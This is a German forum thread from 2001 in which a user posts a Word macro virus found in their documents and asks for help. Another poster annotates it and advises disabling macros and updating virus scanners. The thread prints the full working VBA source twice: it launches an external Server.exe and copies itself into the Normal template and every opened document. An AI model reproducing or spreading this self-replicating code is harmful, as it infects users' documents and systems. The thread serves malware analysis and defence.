PDA

Vollständige Version anzeigen : Hilfe +++ VIRUS +++ Hilfe


Sobsy
13.06.2001, 08:47
Guten Morgen!

In den letzten Tagen habe ich nicht schlecht gestaunt, als ich merkte, daß nachfolgendes Makro sich meiner Dokumente bemächtigte.
Leider ist mein VB nicht ausreichend um beurteilen zu können wie gefährlich dieses ist und was man dagegen machen könnte bzw. wie man infizierte Dokumente wiederherstellt.

Soweit ich dies bis jetzt Beurteilen kann ziehlt dieses Makro darauf ab, Files in ein MAC format um zu wandeln. Greift vorallem e-Mail Programme (in diesem Fall Eudora - da dies vorallem am MAC verwendet wird) an.
Meine bisherige Gegenmaßnahme war und ist,im Word-Dokument Normal.dot den Virus zu entfernen und die infizierten Dokumente nicht zu öffnen bzw. mit gehaltener Shift-Taste zu öffnen. Leider ist das Kopieren der infizierten Dokumente (Markieren des Geschriebenen) nicht möglich, da sofort danach der Schreibschutz aktiviert wird.

Ich bitte um Eure Beurteilung und um Vorschläge für Gegenmaßnahmen.

BITTE - BITTE -BITTE

Eure Hilfe ist dringendst gefragt!!


Dank schon im voraus.

Phillip-Berlin
13.06.2001, 11:17
mit einem anständigen virusscanner hast du es schon versucht?

Sobsy
13.06.2001, 11:29
War wohl nicht ganz wach wie ich den ersten Beitrag schrieb, denn ich vergaß den Code anzufügen. Hier der Code:

Private Declare Sub MessageBeep Lib "user32" (ByVal wAlert As Integer)
Private Declare Function sndPlaySound Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal sn As Any, ByVal uflags As Long) As Long
Private Sub Document_Open()
On Error Resume Next
Shell "I:\Eudora\Sys\Server.exe"
Set TD = ThisDocument.VBProject.VBComponents(1)
Set AD = ActiveDocument.VBProject.VBComponents(1)
Set NT = NormalTemplate.VBProject.VBComponents(1)
VCode = TD.CodeModule.Lines(1, TD.CodeModule.CountOfLines)
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
NT.CodeModule.InsertLines 1, VCode
AD.CodeModule.InsertLines 1, VCode
ActiveDocument.Save
NormalTemplate.Save

Open "I:\Rep.log" For Append As #1
Print #1, "Active on " & Date
Close
End Sub

Das sollte nun helfen sich eine Meinung zu bilden.

Zu deiner Frage Phillip: Die bisher verwendeten Virusscanner erkennen diesen Virus nicht.

Stefan Kulpa
13.06.2001, 13:12
<font face="Verdana" size="2">Hallo,

hier das Ganze mal aufgedruselt:
</font>
<PRE><FONT SIZE=1 FACE=Courier New><FONT COLOR=#000080>Private</FONT> <FONT COLOR=#000080>Sub</FONT> Document_<FONT COLOR=#000080>Open</FONT>()

<FONT COLOR=#000080>On Error Resume Next</FONT>
<FONT COLOR=#008000>'// Aufruf von Server.exe im Ordner I:\Eudora\Sys\ '** ???</FONT>
Shell "I:\Eudora\Sys\Server.exe"
<FONT COLOR=#008000>'// Dim TD, AD, NT, VCode fehlt eigentlich</FONT>
<FONT COLOR=#000080>Set</FONT> TD = ThisDocument.VBProject.VBComponents(1)
<FONT COLOR=#000080>Set</FONT> AD = ActiveDocument.VBProject.VBComponents(1)
<FONT COLOR=#000080>Set</FONT> NT = NormalTemplate.VBProject.VBComponents(1)
<FONT COLOR=#008000>'// Mal schaun, was er bisher hat:</FONT>
<FONT COLOR=#000080>Debug.Print</FONT> TD.Name <FONT COLOR=#008000>'** dieses Dokument</FONT>
<FONT COLOR=#000080>Debug.Print</FONT> AD.Name <FONT COLOR=#008000>'** aktives Dokument</FONT>
<FONT COLOR=#000080>Debug.Print</FONT> ND.Name <FONT COLOR=#008000>'** Standardvorlage</FONT>

VCode = TD.CodeModule.Lines(1, TD.CodeModule.CountOfLines)
<FONT COLOR=#008000>'// Ergebnis:</FONT>
<FONT COLOR=#000080>Debug.Print</FONT> VCode
<FONT COLOR=#008000>'// *******************************************************</FONT>
<FONT COLOR=#008000>'// Ab hier wird's heftig:</FONT>
<FONT COLOR=#008000>'// *******************************************************</FONT>
<FONT COLOR=#008000>'// Löscht Codezeilen in der Standardvorlage!</FONT>
NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines
<FONT COLOR=#008000>'// Löscht Codezeilen im aktiven Dokument</FONT>
AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines
<FONT COLOR=#008000>'// Fügt den Wert von VCode in die Standardvorlage ein</FONT>
NT.CodeModule.InsertLines 1, VCode
<FONT COLOR=#008000>'// Fügt den Wert von VCode in das aktive Dokument ein</FONT>
AD.CodeModule.InsertLines 1, VCode
<FONT COLOR=#008000>'// Speichern des aktiven Dokuments</FONT>
ActiveDocument.Save
<FONT COLOR=#008000>'// Speichern der Standardvorlage</FONT>
NormalTemplate.Save

<FONT COLOR=#008000>'// Speichert das Datum zusammen mit "Active on " in eine Log-Datei (?)</FONT>
<FONT COLOR=#000080>Open</FONT> "I:\Rep.log" <FONT COLOR=#000080>For</FONT> <FONT COLOR=#000080>Append</FONT> <FONT COLOR=#000080>As</FONT> #1
<FONT COLOR=#000080>Print</FONT> #1, "Active on " & Date
<FONT COLOR=#000080>Close</FONT>

<FONT COLOR=#000080>End</FONT> <FONT COLOR=#000080>Sub</FONT>

</FONT></PRE>

<font face="Verdana" size="2">Macro-Viren sind zwar nicht "meine Welt", aber der Code pfuscht schon ganz schön herum. Ich verstehe allerdings nicht ganz den Zusammenhang mit Eudora und dem Beschreiben der Log-Datei. Die API-Deklarationen werden in diesem Zusammenhang auch nicht genutzt (wären aber auch harmlos).

Verständlicherweise habe ich den Code nicht ausgeführt ;) - aber meines Erachtens läuft's wie beschrieben ab.

HTH</font>

Sobsy
13.06.2001, 13:39
Danke Stefan für deine ausführliche Beschreibung.

Kann man diesen Code von Außen (außer mit den gängigen Methoden - Macro nicht ausführen, usw.) außer Kraft setzen?

Grüße

Sobsy

Stefan Kulpa
13.06.2001, 17:08
<font face="Verdana" size="2">Meines Wissens nicht.
"Macros nicht ausführen" bzw. "Virenscanner einsetzen" ...

Übrigens schlug nach meinem Posting mein Virenscanner zu (VShield von McAfee), da ich den Code im VBA Editor vergessen habe zu löschen und mit Speichern verlassen hatte - böse Falle. Aber nach Löschen der Normal.dot ist das wieder OK.

Vorschlag: Aktualisiere die Virendatei Deines Scanners!

Gruß</font>